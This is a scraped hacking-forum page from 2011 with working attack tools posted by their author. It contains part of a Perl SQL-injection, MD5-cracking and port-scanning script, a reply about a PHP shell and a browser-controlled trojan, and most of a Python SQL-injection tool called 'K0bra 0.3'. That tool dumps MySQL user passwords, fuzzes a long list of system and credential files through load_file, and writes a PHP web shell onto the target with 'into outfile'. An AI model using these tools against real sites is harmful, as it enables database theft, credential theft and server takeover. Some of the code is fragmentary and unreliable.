<pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logotres { <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logocuatro { <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> ); } sub logocinco { <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> ); } sub logoseis { <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> ); } sub logosiete { <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> ); } sub copyright { qq(<br><br><br><br><br><br><br><center><a href =?home =true ><b>Return to home </b ></a ></center ><br><br>); } print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0"; my $asc; my $page = $_[0]; ( $pass1, $pass2 ) = &bypass( $_[1] ); $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; $total = "1"; for my $rows ( 2 .. 200 ) { $asc .= "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; $total .= "," . $rows; $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc; $test = toma($injection); if ( $test =~ /RATSXPDOWN/ ) { @number = $test =~ m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); my $save = $auth; $total =~ s/$number[0]/hackman/; . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>"; details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" ); } } } sub details { my ( $page, $bypass, $save ) = @_; ( $pass1, $pass2 ) = &bypass($bypass); if ( $page =~ /(.*)hackman(.*)/ig ) { print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 ); $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2; $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2; $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 ); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ( $test2 =~ /ERTOR854/ig ) { print "[mysql.user] : ON<br>"; } else { print "[mysql.user] : OFF<br>"; } if ( $test1 =~ /ERTOR854/ig ) { print "[information_schema.tables] : ON<br>"; } else { print "[information_schema.tables] : OFF<br>"; } if ( $test3 =~ /ERTOR854/ig ) { print "[load_file] : ON<br>"; } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start . $concat . $end . $pass2; $code = toma($injection); if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>"; } else { print "<br>[-] Not found any data<br>"; } } } sub encode { my $string = $_[0]; $hex = '0x'; for ( split //, $string ) { } } sub bypass { if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } else { return ( "+", "--" ); } } sub ascii { } sub toma { return $nave->get( $_[0] )->content; } sub tomax { } sub get_links { $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); sub agarrar { my ( $a, %b ) = @_; } } sub crackit { my $secret = $_[0]; print "<br><br>[+] Cracking $_[0]<br><br>"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables' => '{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables' => '{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data ( keys %hash ) { if ( $hash{$data}{tipo} eq "get" ) { $code = toma( $data . $_[0] ); if ( $code =~ /$hash{$data}{regex}/ig ) { print "<br>[+] Decoded : " . $1 . "<br><br>"; print $secret. ":" . $1 . "<br>"; } } else { $code = tomar( $data, $hash{$data}{variables} ); if ( $code =~ /$hash{$data}{regex}/ig ) { print $secret. ":" . $1 . "<br>"; } } } print "<br>[+] Finish<br>"; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub scanuno { my %ports = ( "21" => "ftp", "22" => "ssh", "25" => "smtp", "80" => "http", "110" => "pop3", "3306" => "mysql" ); print "<br>[+] Scanning $_[0]<br><br><br>"; for my $port ( keys %ports ) { if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) { print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>"; } } print "<br><br>[+] Scan Finish<br>"; } # The End ?
|
|
|
|
|
429
|
Programación / Scripting / Re: [Perl] Commander
|
en: 9 Diciembre 2011, 15:06 pm
|
yo hice una phpshell llamada poisonshell , tiene lo que buscas , solo es cuestion de buscarla en google , la version 1.0 de mi shell esta aca. http://pastebin.com/FM7j0w7Neso si lo que buscas es algo como commander pero que pida password no te puedo ayudar porque tendria que hacer una nueva version de este programa , otra cosa espero que tengas en cuenta que commander es solo un troyano que se maneja por navegador , no tiene nada que ver con phpshells,c99,r57. |
|
|
|
|
430
|
Programación / Scripting / [Python] K0bra 0.3
|
en: 3 Diciembre 2011, 16:35 pm
|
Un completo scanner SQLI hecho en python Las funciones son las siguientes - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
- Manejo de control+c
#!usr/bin/python #k0bra 0.3 (C) Doddy Hackman 2011 import os,sys,urllib2,re,binascii from urlparse import urlparse files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"] def installer(): try: os.mkdir("logs",0777) except: pass def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text) file.close() def gethost(test): return urlparse(test).netloc def header() : print "" print "" print " @ @@ @ " print "@@ @ @ @@ " print " @ @@ @ @ @ @ @ @ @@@ " print " @ @ @ @ @@ @ @@@ @ @ " print " @@ @ @ @ @ @ @@@ " print " @ @ @ @ @ @ @ @ @ " print "@@@ @ @@ @@@ @@@ @@@@@" print "" print "" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/**/") else: return("+","--") def reiniciar(): copyright() raw_input() sta() def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n") print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db2 = db table2 = table db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db2 = db db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla2 = tabla tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching columns\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found in table "+tabla2+"] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def men(): print "\n[+] Press any key to continue\n" raw_input() menu(page,bypass) def fuzz(web,bypassx): print "\n[+] Fuzzing files with load_file()\n" pass1,pass2 = bypass(bypassx) for archivos in files: nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") print "\n[+] Finished\n" def fuzzfile(web,bypassx): pass1,pass2 = bypass(bypassx) archivos = raw_input("\n[File To load] : ") nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") else: print "\n\n[-] Error" def into(web,passx): pass1,pass2 = bypass(passx) dira = raw_input("\n\n[Full Source Discloure] : ") diro = raw_input("\n[Directory to test] : ") linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = dira+"/cmd.php" lugardos = diro+"/cmd.php" webtest = "http://"+gethost(web)+lugardos web1 = re.sub("hackman",linea,web) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if (re.findall("Mini Shell By Doddy",code)): print "\n\n[shell up] : "+webtest savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest) else: print 